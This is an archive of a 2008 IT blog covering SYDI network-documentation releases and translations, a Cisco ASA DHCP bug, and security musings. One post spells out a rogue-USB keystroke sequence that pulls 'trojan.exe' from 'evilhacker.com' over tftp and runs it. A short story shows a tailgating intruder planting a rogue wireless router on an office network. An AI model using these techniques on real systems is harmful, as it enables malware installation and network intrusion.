Ogenstad.net

SYDI-Server 2.2 Released

patrick.ogenstad — Tue, 02 Dec 2008 19:11:03 +0000

Yesterday I released version 2.2 of my network documentation tool, SYDI-Server. The new package contains some small fixes, but also a script which lets you audit local group memberships in all your computers. That is local machine specific groups, not domain local groups.

So what you’ll be able to do is to track down all your users running as local administrators, or just find strange groups which shouldn’t appear in your organization.

I’ve also launched a network documentation newsletter for SYDI. This will be my main information channel for SYDI and my writings about network documentation. According to many of its users SYDI is a great tool. I would say it’s a great tool for doing mundane tasks i.e. collecting and presenting information. What I’m saying is that you don’t really need the sydi-server script, it’s just that if you use it you spend 2 minutes compared to several hours. However there’s much more to network documentation than the data collected from sydi-server.

If you like SYDI and want to improve your network documentation be sure to sign up, the newsletter is as free as SYDI.

Though before you sign up you might want to grab the latest sydi-server.

How far do you trust an unknown USB Stick?

patrick.ogenstad — Thu, 11 Sep 2008 21:15:45 +0000

Suppose there was an unknown USB stick, waiting to be found in your parking lot. Perhaps this would scare you enough to disable autorun throughout your domain (you’ve done that right)? Now imagine if someone gave one of your users a USB device which was connected to a workstation on your network and in turn your network was compromised. How would you explain that?

I don’t know if this is a new idea but the thought came to be while listening to the Pilot episode of the Securabit Podcast, thanks to Martin for pointing to the Podcast. In this episode they talk about YubiKey. The YubiKey is a USB authentication solution, when you plug in the YubiKey (usb device) to your computer it is recognized as a USB keyboard. It has one button and when pressed it enters a onetime password. I won’t go into any details but if you’re interested you can watch a one minute video on the YubiKey site or listen to the Securabit Podcast.

The product got me thinking, what if someone were to make a device that looks like a usb stick but in fact is a USB keyboard just like the YubiKey. However instead of being programmed to enter a random password string it was made to enter a malicious string of characters. For example an attacker might choose to target a Windows box with these characters.

[windows] + r cmd.exe [enter] tftp -i evilhacker.com GET trojan.exe %temp%\trojan.exe [enter] %temp%\trojan.exe [enter] exit [enter]

This would install a trojan on the target computer (assuming the user is allowed to runt tftp) simply because the device was connected to the computer.

This shouldn’t be a great threat and this attack in particular would be mitigated by just locking the screen. However it still doesn’t hurt to have respect for the unknown and I’d stay away from those USB sticks found in the parking lot.

Social Engineering on the Train

patrick.ogenstad — Tue, 19 Aug 2008 07:11:45 +0000

Social Engineering on the Train

During your childhood I’m sure you experienced a lot of magic, some things were just so fantastic and mind boggling you just couldn’t figure it out. For me, one of these extraordinary events was the work of train conductors. Before you laugh hear me out!

On some of the over ground trains in Sweden you don’t need a ticket to go on the train, however when the train conductor asks for your ticket you should be prepared to show it. So if you’re never asked, you basically don’t need the ticket.

There was usually just one train conductor for the entire train and he would walk between the different wagons at each station. Stepping into a wagon he could walk up to all the new passengers since he entered the last time and ask the passengers for their tickets.

What used to blow my mind was that as by magic the train conductors would always know which the new passengers were. They wouldn’t bug the existing passengers who had already shown their ticket. When I was a child I thought they must be superhuman, that they either had fantastic memory or were absolutely brilliant at what they did.

Traveling on the same trains now I can see it so easily. The train conductors don’t ask me for my ticket anymore, though they ask everyone around me.

I still have a monthly pass as it would go against my morals not to have a valid ticket, besides I also use it to ride the bus and the subways. I just find it interesting to experiment with social engineering in a harmless environment.

What I noticed was that when the train conductor entered the wagon all the new passengers would reach for their tickets. Everyone who had already shown his ticket just ignored the train conductor.

In reality the train conductors aren’t looking for new passengers, they are looking for people who want to show their tickets or rather they are looking for people who behave in a certain way.

So if I just ignore them when they come they ignore me. I’ve also tried looking at them, even having eye contact and smiling. As long as I don’t reach for my ticket I’m safe.

Looking at this from a security perspective they are very poor security guards. Their job is to protect the resource (train ride) from unauthorized use (passengers who don’t pay).

Of course taking this one step further this could be according to plan, in the name of user friendliness. As in don’t bug and annoy users who have already shown their pass. I would put my money on the former explanation.

In terms of social engineering this is really the low hanging fruits. You don’t have to engage in conversation or ask questions. It’s as easy as walking by a manned reception, if you behave like you belong on the inside many will just assume you do.

German support for SYDI and the impact of translations

patrick.ogenstad — Tue, 12 Feb 2008 20:35:47 +0000

German has joined the ranks of languages you can use with SYDI-Server. The file will be included in the next version of SYDI-Server. Until then it is available for download through the download page. Thanks to Jan Picard who has made the translation file.

So now we can translate the xml files generated by SYDI-Server to eight different languages. Though this is good if your organization doesn’t use English as its primary language it will mean that in order to keep the SYDI-Server package completely updated I will have to keep in touch with more people and involve more people each time I make a change. This is one of the reasons why there werenâ€t any new features in the core sydi-server script in the 2.1 version.

This is not the way I want it to be, i.e. I see having more translations as a good thing, but still the rest of the project shouldnâ€t have to suffer for it. Because of this I wonâ€t cross mountains in order to get updated translation files for each language since it could delay future releases (more than necessary).

The way I plan to solve this is to create a new package for the translations file and just release those packages more often. That way I can update the English and Swedish files for each release of SYDI-Server and just point to the translation pack for the rest of them.

As always your thoughts are more than welcome, and thanks again to Jan Picard!

Danish Language File for SYDI-Server

patrick.ogenstad — Tue, 05 Feb 2008 21:27:48 +0000

Thanks to Morten Vitved we now have a Danish language file for SYDI. This means we can now translate the XML files generated by SYDI-Server in seven different languages.
The file with be included in the next version of SYDI-Server, until that time you can download it as a patch from the SYDI download page.

If you’re missing your favorite language it’s easy enough to create your own language file. Just open lang_english.xml and one of the other ones in notepad and you should be able to figure out what to do.

SYDI-Server 2.1 Released

patrick.ogenstad — Wed, 30 Jan 2008 06:23:20 +0000

Around 1,5 years has passed since I released SYDI-Server 2.0 and now I’ve finally gotten my act together and released SYDI-Server 2.1!

Most of my work has been concentrated around the SYDI-Overview script and I’ve added a tab which compares services between different computers. I’ve also added an ip address to the overview sheet, however if the machine has two addresses SYDI-Overview will only show one of them. I will look into this in later versions of the scripts.

There are also a few bug fixes.

Anyway SYDI-Server is back again, you can head over the homepage and download it.

The Future of SYDI

patrick.ogenstad — Mon, 17 Dec 2007 21:57:41 +0000

As many of you have pointed out it’s been a while since the last version of SYDI was released. Darrin left a comment saying that the world will need an updated SYDI for new products like Windows Server 2008, SQL 2008 and Exchange 2007.

I have some good news, some bad and some thoughts of the future.

The Good News

First of all the good news, I’m still developing SYDI. I’m working on SYDI-Server 2.1, most of the work is concentrated on the sydi-overview script. I’ve added a service comparison tab where you can compare all services on your machines. I have planned to include installed programs as another tab. Another feature request I’m often asked about, which I want to include in 2.1 is scheduled tasks.

The Bad News

The bad news (from a SYDI point of view) is that my time is very limited, and I’ve chosen to spend my free time in other ways than to code on SYDI. Another issue aside from lack of time is that when I started writing SYDI back in 2004 I was working mostly with Microsoft technology. Though I still work with Microsoft, these days I spend most of my time working with Cisco products. In terms of scripting I’ve written a few cool tools for Cisco devices. So if you like Cisco and if Netsafe, my company, decides to release the tools it might make you happy.

SYDI in the Crystal Ball

So what does the future hold for SYDI, these are things that have not yet come to pass and might not, it depends on the issues I mentioned in the bad news and how motivated I am to spend time working on SYDI. That being said I still love SYDI and want to see it grow.

SYDI-Exchange, I don’t really see much develpment with SYDI-Exchange. My reasoning is that I would like a SYDI-ActiveDirectory instead since a lot of the Exchange information is stored in Active Directory anyway it makes sense. The SYDI-ActiveDirectory would collect all the information needed, and there could be a script for reporting an Exchange organization. Perhaps combining a report based on SYDI-ActiveDirectory with specific server reports from SYDI-Server for the Exchange Servers?

SYDI-ActiveDirectory, what I see for SYDI-ActiveDirectory is perhaps one or two collection scripts and several reporting scripts. This could be reporting for OU structures, Group Policies, Delegation, Exchange, Sites etc.

SYDI-Server, I’m quite happy with SYDI-Server as it is. I have some thoughts on adding more specific information. For example I’ve seen that you can download WMI providers from Dell, it would be cool if you can do some reporting on RAID controllers on Dell servers I haven’t looked closer at this yet though. Reporting from the Security Center would be good to have.

SYDI-SQL, first off I’ve thought of just releasing a 0.9 version and fixing a small bug which makes the script crash for a lot of people. I’ve just not gotten around to it. Other than that SYDI-SQL is probably the script I like the least and I don’t actually use it much myself. What are your thoughts on this? Is SYDI-SQL something you want to see more of?

Visio, generating Visio diagrams from SYDI-ActiveDirectory and SYDI-Server would be cool.

PowerShell, I’ve received some queries about using PowerShell and giving vbscript the boot. The short answer is that I would love to. However there are some issues with PowerShell and Office if you’re living outside the US (or at least if you use non US Regional Settings). There are workarounds but they are a hassle. Before I see a good solution to this problem I won’t be writing any reporting parts in PowerShell. With that being said I have thought of breaking up the scripts in smaller parts. I have thought of having separate scripts for collecting information and writing reports.

XML Format, if you know XML you’re probably not blown away (in a good way) with how I’ve designed the XML format in SYDI. I’ve had some thoughts on throwing the out the old format and creating one that is much more generic. This would help not only me but other people who develop tools for SYDI.

InfoPath, I have some thoughts about the xml files used with ss-xml2word.vbs. As it is now you have to edit the “written” xml file directly in your favorite editor. It might be cool if you could do that in InfoPath or something which would let you see the data as you typed the information. Perhaps this could be done in Word too. I’m not really sure how I want to do it, but all the people in the flash demos I’ve seen on InfoPath seem so happy. Any thoughts?

Database backend, since I started developing SYDI I’ve gotten questions about storing SYDI information in SQL format. My thoughts are that XML is the default format but that it should be easy to convert back and forth between different formats. One thought I’ve had with the database is if you’re just supposed to have one view of your data or if you want to have snapshots so you can go back and forth in time and see when changes occurred. A database could also store the information which is used as the “written documentation” in ss-xml2word.vbs. I want a database design which can include all information about Windows computers, Active Directory and perhaps other aspects of the network. However I don’t want countless tables. Perhaps I need a database design book for Christmas.

SYDI-WindowsMobile, well I have a new HTC TyTN II phone and I have to do some scripting against it. It might not be SYDI though

Licence inventory, I have some thoughts about using the data collected from SYDI to handle licensing for some customers. I’ve thought about having some frontend in MS Access 2007.

Living in the now, better support for Vista & Windows 2008 and other current Microsoft products.

Script Signing, I will be adding digital signatures to the script files I publish in the future.

Network Documentation Guides, in general I want more written tutorials and guides for network documentation on the SYDI Project site. I’ve been planning on writing a few pieces.

Other projects I’ve thought of which might be cool but which aren’t on the map yet; SYDI-PKI, SYDI-Sharepoint, SYDI-ForeFront, SYDI-ISA

SYDI-Linux, if you have any important projects which are depending desperatly on the next version of SYDI-Linux. Well, God help you!

Sorry for not answering your emails!

As I stated earlier, my time is limited and I just haven’t had the time to reply to all the emails I’ve gotten from you users. Still I love getting email from you, though I have to say some days it’s not healthy for my ego.

Anyway I will try to get through my backlog and reply to your emails.

How you can help with SYDI

Darrin also asked about pitching in and giving me a hand with SYDI. Feel free to suggest how you can help and what you are willing to work on. However keep in mind that I might be a bit restrictive with what I decide to add. I don’t like code that I don’t understand or that I’m not able to verify. So if your code depends on some special hardware I might not include it, that is if you don’t ship the hardware to me so I can test it.

Translations, with ss-xml2word.vbs it’s easy to have a localized version of the SYDI-Server report. I’ve received a few which I will be including in SYDI-Server 2.1. If you want support for your favorite language just send me a translated xml language file. Send me an email if you’re unsure of what to do.

Tell your friends, tell your friends about SYDI. Most of my motivation to code on the project comes from seeing how many people use the project also the feedback I get is great. So spread the word.

Link to SYDI, aside from telling your friends another great way to support the project is to have a link to SYDI. So if you have a website or a blog, let other people know that you use SYDI by linking to SYDIproject.com.

What do You want?

If you were sitting in Santa’s lap what would you want from SYDI?

What are your thoughts on this post?

How can SYDI be improved?

What crazy ideas do you have, what would you kill for?

How can the sydiproject.com website be improved? Should there be a section for feature requests? Forums? We have this at the project site at SourceForge, but I don’t really like that format.

Send me an email or better yet leave a comment below so others can comment on your thoughts.

Cisco ASA 5500 and the Hunt for the Lost Gateway

patrick.ogenstad — Wed, 14 Nov 2007 21:43:17 +0000

Don’t get me wrong, I love my little ASA 5505 especially with the Security plus license enabling me to have 20 VLANs. As they say a house with less than ten VLANs is like a body without a soul. However I’ve had some issues with the little fellow. As I’ve mentioned earlier there was an issue where my ISP wasn’t following the RFC for DHCP to the result that my ASA 5505 couldn’t get a DHCP lease, after talking with Cisco they quickly sent me a patch with a workaround and later published a new version of the ASA software.

Since then I’ve noticed that every once in a while my Internet connection would die. The first times it happened I thought it was just my ADSL connection acting up. However I noticed when running a “show route” from the ASA that I didn’t have a default gateway, making IP communication somewhat hard.

The strange part was that I was able to ping my default gateway, so the link was up.

I noticed that this would happen just after the Cisco ASA was trying to renew it’s dhcp lease. (“show ip address OUTSIDE dhcp lease”)

The strange part was it was so inconsistent it sometimes it could take days before it happened and some days it would happen several times during the day. I was planning on addressing the problem for quite some time but whenever it happened I was always occupied with something more important so I just did a “shutdown” and “no shutdown” on the outside interface and I would have my connection again. Another workaround is to set a static default gateway address, though this wouldn’t remove the problem the down time was much less.

With a static route the Internet connection would die for about 100 seconds instead of having to wait for the next DHCP renewal which in my case is 30 minutes.

In the end I got around to contacting Cisco to report this strange behavior.

Lessons learned; I love Cisco, since the command line is so powerful using a Cisco device lets me figure out what the problem actually is which is great compared to other firewalls you would see in a home network environment.

Another thing I love about Cisco is that they will setup and test this in their lab until they find the problem. Soon after contacting them they confirmed there was a problem. I want all vendors to do that!

The fix is now published on their site so if you’re experiencing this problem you should upgrade to 8.0(3).

Slide Executive 2.0 Released

patrick.ogenstad — Tue, 25 Sep 2007 05:36:49 +0000

I would like to congratulate my friends at Novatrox for releasing Slide Executive 2.0. Slide Executive is a set of applications which enables you to build a library or database of your PowerPoint presentations. You can then use the library to quickly find a presentation or create a virtual presentation on the fly.

The Slide Executive suite consists of two applications. Slide Executive Desktop, which is a desktop application intended for single users and Slide Executive Professional which is a web based application.

The Desktop application is free to try and if you want to test the web application you can just contact Novatrox in order to get a demo, if you do please send them my regards!

The current versions of the products are all written in C#, but I actually worked on a product which was a predecessor to Slide Executive. At the time I was coding in Visual Basic and ASP, and in fact thatâ€s where I picked up most of the coding skills I used when I created SYDI.

The Broken NDA – Part 5

patrick.ogenstad — Fri, 31 Aug 2007 19:35:15 +0000

midfr0st was smoking a cigarette just below a DiMavia logo, yesterday he had scouted the area and reluctantly decided to set his plan to action.

Here they come, he thought as some employees were returning from lunch. His back was aching, the better part of yesterday he had spent to create the outfit he was now wearing. He had gone to a hardware store and bought some paint cans and working clothes. midfr0st had “aged” the clothes to his best effort by trashing them and splashing paint on them. He had been crouched on the floor for hours and was paying the price today. midfr0st threw his cigarette to the pavement and stepped on it just as the employees walked past him. He pulled down his baseball cap and followed them into the building, in his hands he had two buckets of paint and something that from the outside looked like a toolbox.

The receptionist looked up at the approaching crowd and smiled, her gaze swept by midfr0st. For a moment his heart skipped a beat, but she didn’t take any notice of him. A man held an rfid key above a sensor and a small gate swung open, the group walked through the gate. midfr0st was close to panic as he saw the gate beginning to close. He was about to turn around and leave when a woman looked over her shoulder straight at him. When she saw that he had both hands occupied, she held the gate for him to pass through.

“Thank you” he whispered as he walked by trying to avoid eye contact. midfr0st slowed down and allowed the group to walk away from him.

He wasn’t sure of where he was going, he just knew which side of the building he wanted to aim for. While walking around he mostly just tried to avoid people. It was hard to avoid everyone and soon he started to relax. I’m invicible, midfr0st realized as people was walking passed him seemingly without taking any notice at all.

Soon he saw an office door with a yellow post-it note, “On Conference Until Next Monday”. midfr0st walked into the office and shut the door behind him. He opened his toolbox and produced a wireless router, crawled under the desk and unplugged the Ethernet cable from the computer and connected it to a switch port on the router. He took another cable from his toolbox and connected it to the switch port and the computer, after connecting some power to the wireless device he placed it on the computer hoping no one would see the intruding object.

midfr0st left the room and headed for the exit. If they’re using some layer 2 NAC, the timeframe will be too short for this to work anyway and all I’ll have lost is a wireless router.